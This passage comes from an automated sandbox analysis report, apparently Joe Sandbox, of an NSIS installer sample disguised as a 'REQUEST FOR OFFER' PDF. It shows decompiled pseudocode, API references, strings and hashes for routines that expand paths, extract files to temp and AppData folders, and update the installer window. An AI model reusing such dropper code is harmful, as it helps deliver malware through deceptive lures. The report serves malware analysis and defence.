				signed int _t48;
				WCHAR* _t49;
				signed char _t51;
				signed int _t52;
				signed int _t53;
				signed int _t54;
				short _t66;
				short _t67;
				short _t69;
				short _t71;
				void* _t81;
				signed int _t85;
				intOrPtr* _t89;
				signed char _t90;
				void* _t98;
				void* _t108;
				short _t109;
				signed int _t112;
				void* _t113;
				WCHAR* _t114;
				void* _t116;

				_t113 = __esi;
				_t108 = __edi;
				_t81 = __ebx;
				_t48 = _a8;
				if(_t48 < 0) {
					_t48 =  *( *0x42921c - 4 + _t48 * 4);
				}
				_push(_t81);
				_push(_t113);
				_push(_t108);
				_t89 =  *0x42a278 + _t48 * 2;
				_t49 = 0x4281e0;
				_t114 = 0x4281e0;
				if(_a4 >= 0x4281e0 && _a4 - 0x4281e0 >> 1 < 0x800) {
					_t114 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t109 =  *_t89;
					if(_t109 == 0) {
						break;
					}
					__eflags = (_t114 - _t49 & 0xfffffffe) - 0x800;
					if((_t114 - _t49 & 0xfffffffe) >= 0x800) {
						break;
					}
					_t98 = 2;
					_t89 = _t89 + _t98;
					__eflags = _t109 - 4;
					_v8 = _t89;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t114 = _t109;
							_t114 = _t114 + _t98;
							__eflags = _t114;
						} else {
							 *_t114 =  *_t89;
							_t114 = _t114 + _t98;
							_t89 = _t89 + _t98;
						}
						continue;
					}
					_t51 =  *((intOrPtr*)(_t89 + 1));
					_t90 =  *_t89;
					_v8 = _v8 + 2;
					_t85 = _t90 & 0x000000ff;
					_t52 = _t51 & 0x000000ff;
					_a8 = (_t51 & 0x0000007f) << 0x00000007 | _t90 & 0x0000007f;
					_v16 = _t52;
					_t53 = _t52 | 0x00008000;
					__eflags = _t109 - 2;
					_v24 = _t85;
					_v28 = _t85 | 0x00008000;
					_v20 = _t53;
					if(_t109 != 2) {
						__eflags = _t109 - 3;
						if(_t109 != 3) {
							__eflags = _t109 - 1;
							if(_t109 == 1) {
								__eflags = (_t53 | 0xffffffff) - _a8;
								E00406234(_t85, _t109, _t114, _t114, (_t53 | 0xffffffff) - _a8);
							}
							L42:
							_t54 = lstrlenW(_t114);
							_t89 = _v8;
							_t114 =  &(_t114[_t54]);
							_t49 = 0x4281e0;
							continue;
						}
						__eflags = _a8 - 0x1d;
						if(_a8 != 0x1d) {
							__eflags = (_a8 << 0xb) + 0x42b000;
							E00406212(_t114, (_a8 << 0xb) + 0x42b000);
						} else {
							E00406159(_t114,  *0x42a248);
						}
						__eflags = _a8 + 0xffffffeb - 7;
						if(_a8 + 0xffffffeb < 7) {
							L33:
							E004064A6(_t114);
						}
						goto L42;
					}
					_t112 = 2;
					_t66 = GetVersion();
					__eflags = _t66;
					if(_t66 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42a2c4;
						if( *0x42a2c4 != 0) {
							_t112 = 4;
						}
						__eflags = _t85;
						if(_t85 >= 0) {
							__eflags = _t85 - 0x25;
							if(_t85 != 0x25) {
								__eflags = _t85 - 0x24;
								if(_t85 == 0x24) {
									GetWindowsDirectoryW(_t114, 0x400);
									_t112 = 0;
								}
								while(1) {
									__eflags = _t112;
									if(_t112 == 0) {
										goto L30;
									}
									_t67 =  *0x42a244;
									_t112 = _t112 - 1;
									__eflags = _t67;
									if(_t67 == 0) {
										L26:
										_t69 = SHGetSpecialFolderLocation( *0x42a248,  *(_t116 + _t112 * 4 - 0x18),  &_v12);
										__eflags = _t69;
										if(_t69 != 0) {
											L28:
											 *_t114 =  *_t114 & 0x00000000;
											__eflags =  *_t114;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v12, _t114);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t69;
										if(_t69 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t71 =  *_t67( *0x42a248,  *(_t116 + _t112 * 4 - 0x18), 0, 0, _t114); // executed
									__eflags = _t71;
									if(_t71 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryW(_t114, 0x400);
							goto L30;
						} else {
							_t87 = _t85 & 0x0000003f;
							E004060DF(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a278 + (_t85 & 0x0000003f) * 2, _t114, _t85 & 0x00000040);
							__eflags =  *_t114;
							if( *_t114 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatW(_t114, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E00406234(_t87, _t112, _t114, _t114, _v16);
							L30:
							__eflags =  *_t114;
							if( *_t114 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t66 - 0x5a04;
					if(_t66 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t114 =  *_t114 & 0x00000000;
				if(_a4 == 0) {
					return _t49;
				}
				return E00406212(_a4, _t49);
			}

0x00406234
0x00406234
0x00406234
0x0040623a
0x0040623f
0x00406250
0x00406250
0x00406258
0x00406259
0x0040625a
0x0040625b
0x0040625e
0x00406266
0x00406268
0x00406281
0x00406284
0x00406284
0x00406480
0x00406480
0x00406486
0x00000000
0x00000000
0x00406294
0x0040629a
0x00000000
0x00000000
0x004062a2
0x004062a3
0x004062a5
0x004062a9
0x004062ac
0x0040646d
0x0040647b
0x0040647e
0x0040647e
0x0040646f
0x00406472
0x00406475
0x00406477
0x00406477
0x00000000
0x0040646d
0x004062b2
0x004062b5
0x004062c4
0x004062ca
0x004062cd
0x004062d0
0x004062da
0x004062df
0x004062e1
0x004062e5
0x004062e8
0x004062eb
0x004062ee
0x0040640e
0x00406412
0x00406447
0x0040644b
0x00406450
0x00406455
0x00406455
0x0040645a
0x0040645b
0x00406460
0x00406463
0x00406466
0x00000000
0x00406466
0x00406414
0x00406418
0x0040642e
0x00406435
0x0040641a
0x00406421
0x00406421
0x00406440
0x00406443
0x00406406
0x00406407
0x00406407
0x00000000
0x00406443
0x004062f6
0x004062f7
0x004062fd
0x004062ff
0x00406319
0x00406319
0x00406320
0x00406320
0x00406327
0x0040632b
0x0040632b
0x0040632c
0x0040632e
0x0040636a
0x0040636d
0x0040637d
0x00406380
0x00406388
0x0040638e
0x0040638e
0x004063eb
0x004063eb
0x004063ed
0x00000000
0x00000000
0x00406392
0x00406399
0x0040639a
0x0040639c
0x004063b6
0x004063c4
0x004063ca
0x004063cc
0x004063e7
0x004063e7
0x004063e7
0x00000000
0x004063e7
0x004063d2
0x004063dd
0x004063e3
0x004063e5
0x00000000
0x00000000
0x00000000
0x004063e5
0x0040639e
0x004063a1
0x00000000
0x00000000
0x004063b0
0x004063b2
0x004063b4
0x00000000
0x00000000
0x00000000
0x004063b4
0x00000000
0x004063eb
0x00406375
0x00000000
0x00406330
0x00406332
0x0040634d
0x00406352
0x00406356
0x004063f5
0x004063f5
0x004063f9
0x00406401
0x00406401
0x00000000
0x004063f9
0x00406360
0x004063ef
0x004063ef
0x004063f3
0x00000000
0x00000000
0x00000000
0x004063f3
0x0040632e
0x00406301
0x00406305
0x00000000
0x00000000
0x00406307
0x0040630b
0x00000000
0x00000000
0x0040630d
0x00406311
0x00000000
0x00406313
0x00406313
0x00000000
0x00406313
0x00406311
0x0040648c
0x00406497
0x004064a3
0x004064a3
0x00000000

APIs

GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll,?,004053A8,Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll,00000000,00000000,00000000), ref: 004062F7
GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406375
GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406388
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004063C4
SHGetPathFromIDListW.SHELL32(?,Call), ref: 004063D2
CoTaskMemFree.OLE32(?), ref: 004063DD
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406401
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll,?,004053A8,Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll,00000000,00000000,00000000), ref: 0040645B

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406343
Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll, xrefs: 00406259
Call, xrefs: 0040625E, 0040633E, 0040635F, 00406374, 00406387, 004063A3, 004063CE, 00406400, 00406406, 00406420, 00406434, 00406454, 0040645A, 00406466, 00406499
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004063FB

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-2657691399
Opcode ID: 978d560dfc87019ac3657ebba0841bd774ce65c1ae89d16051c02eb976f42344
Instruction ID: 8986ea92d4020f82ea273b0cadebf120af401304848ce5cddb84501886c13395
Opcode Fuzzy Hash: 978d560dfc87019ac3657ebba0841bd774ce65c1ae89d16051c02eb976f42344
Instruction Fuzzy Hash: C661E371A00115EBDB209F24CD40AAE37A5AF50314F52817FE947BA2D0D73D8AA6CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __edi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t81;
				void* _t82;
				WCHAR* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402C53(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x28) & 0x00000007;
				_t35 = E00405C3D( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t84 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405BC6(E00406212(_t84, L"C:\\Users\\Arthur\\AppData\\Local\\Folkedansens\\Suffigere\\Glaucophane")), ??);
				} else {
					E00406212();
				}
				E004064A6(_t84);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E00406555(_t84);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x1c);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405DC2(_t84);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00405DE7(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x30) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E00405371(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2c8;
						goto L32;
					} else {
						E00406212("C:\Users\Arthur\AppData\Local\Temp\nsq493.tmp", _t81);
						E00406212(_t81, _t84);
						E00406234(_t77, _t81, _t84, "C:\Users\Arthur\AppData\Local\Temp\nsq493.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x14)));
						E00406212(_t81, "C:\Users\Arthur\AppData\Local\Temp\nsq493.tmp");
						_t64 = E00405957("C:\Users\Arthur\AppData\Local\Temp\nsq493.tmp\System.dll",  *(_t86 - 0x28) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2c8 =  &( *0x42a2c8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t84);
								_push(0xfffffffa);
								E00405371();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E00405371(0xffffffea,  *(_t86 - 8)); // executed
				 *0x42a2f4 =  *0x42a2f4 + 1;
				_t45 = E0040317B(_t79,  *((intOrPtr*)(_t86 - 0x20)),  *(_t86 - 0x30), _t77, _t77); // executed
				 *0x42a2f4 =  *0x42a2f4 - 1;
				__eflags =  *(_t86 - 0x1c) - 0xffffffff;
				_t82 = _t45;
				if( *(_t86 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x30), _t86 - 0x1c, _t77, _t86 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x30)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E00406234(_t77, _t82, _t84, _t84, 0xffffffee);
					} else {
						E00406234(_t77, _t82, _t84, _t84, 0xffffffe9);
						lstrcatW(_t84,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t84);
					E00405957();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x004028a1
0x004028a1
0x00402adb
0x00402ade
0x00402ade
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402ae4
0x00402ae4
0x00402ae4
0x00401867
0x00401867
0x00401868
0x00401493
0x004022f7
0x004022f7
0x004022f7
0x00401865
0x0040185e
0x00402ae6
0x00402aea
0x00402aea
0x00401892
0x00401897
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x004022f2
0x00000000
0x004022f2
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane,?,?,00000031), ref: 004017D5

Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F

Part of subcall function 00405371: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
Part of subcall function 00405371: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll,00402EAD), ref: 004053CC
Part of subcall function 00405371: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll), ref: 004053DE
Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C

Strings

Call, xrefs: 0040178D, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane, xrefs: 0040179E
C:\Users\user\AppData\Local\Temp\nsq493.tmp, xrefs: 00401821, 0040183F
C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll, xrefs: 00401835, 00401851

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane$C:\Users\user\AppData\Local\Temp\nsq493.tmp$C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll$Call
API String ID: 1941528284-2799463936
Opcode ID: 00536d43247b0e684560901737a3663a089175b994d03775e1e0762796f7db5e
Instruction ID: 0d28a5e8dae66ca407d9ab1903032e249cf50254bac70f3abe216f7737186e0f
Opcode Fuzzy Hash: 00536d43247b0e684560901737a3663a089175b994d03775e1e0762796f7db5e
Instruction Fuzzy Hash: 0541B131900119BACF217BA5CD45DAF3A79EF01368B20427FF422B10E1DB3C8A519A6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405371 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405371(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429224;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a2f4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E00406234(_t38, 0, 0x422708, 0x422708, _a4);
					}
					_t27 = lstrlenW(0x422708);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429208, 0x422708); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422708;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422708[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422708, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x00405377
0x00405381
0x00405386
0x0040538c
0x00405397
0x0040539a
0x0040539d
0x004053a3
0x004053a3
0x004053a9
0x004053b1
0x004053b4
0x004053d1
0x004053d5
0x004053de
0x004053de
0x004053e8
0x004053f1
0x004053fd
0x00405404
0x00405408
0x0040540b
0x0040541e
0x0040542c
0x0040542c
0x00405430
0x00405432
0x00405435
0x00000000
0x00405435
0x004053b6
0x004053be
0x004053c6
0x004053cc
0x00000000
0x004053cc
0x004053c6
0x004053b4
0x00405441

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
lstrlenW.KERNEL32(00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll,00402EAD), ref: 004053CC
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll), ref: 004053DE
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll, xrefs: 00405392, 004053A2, 004053A8, 004053CB, 004053D7

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll
API String ID: 2531174081-1240761330
Opcode ID: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
Instruction ID: a3987805c55db6f4a015f8fdfae83c311b34e51693a8fcc51f5c24f156ed4de6
Opcode Fuzzy Hash: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
Instruction Fuzzy Hash: A3218C71900518BBCB119F95ED84ACFBFB8EF45350F50807AF904B62A0C3B98A91DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00402660 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00402660(intOrPtr __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x48)) = _t65;
				_t66 = E00402C31(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x50)) = _t72;
				 *((intOrPtr*)(_t76 - 0x38)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2c8 =  *0x42a2c8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x38) = 0x3ff;
					}
					if( *__esi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x30) = __ebx;
						 *(__ebp - 0x10) = E00406172(__ecx, __esi);
						if( *(__ebp - 0x38) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x2c)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx ||  *(__ebp - 8) != __ebx || E00405EC8( *(__ebp - 0x10), __ebx) >= 0) {
										__eax = __ebp - 0x44;
										if(E00405E6A( *(__ebp - 0x10), __ebp - 0x44, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x1c)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x10), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x1c)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x48) = __ecx;
											 *(__ebp - 0x44) = __eax;
											if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406159( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x44 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x44, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x44);
												} else {
													__esi =  *(__ebp - 0x48);
													__esi =  ~( *(__ebp - 0x48));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x44) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x48) =  *(__ebp - 0x48) - 1;
														__esi = __esi + 1;
														__eax = SetFilePointer( *(__ebp - 0x10), __esi, __ebx, 1); // executed
														__ebp - 0x44 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x44, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x30) == 0xd ||  *(__ebp - 0x30) == 0xa) {
														if( *(__ebp - 0x30) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x48) =  ~( *(__ebp - 0x48));
															__eax = SetFilePointer( *(__ebp - 0x10),  ~( *(__ebp - 0x48)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
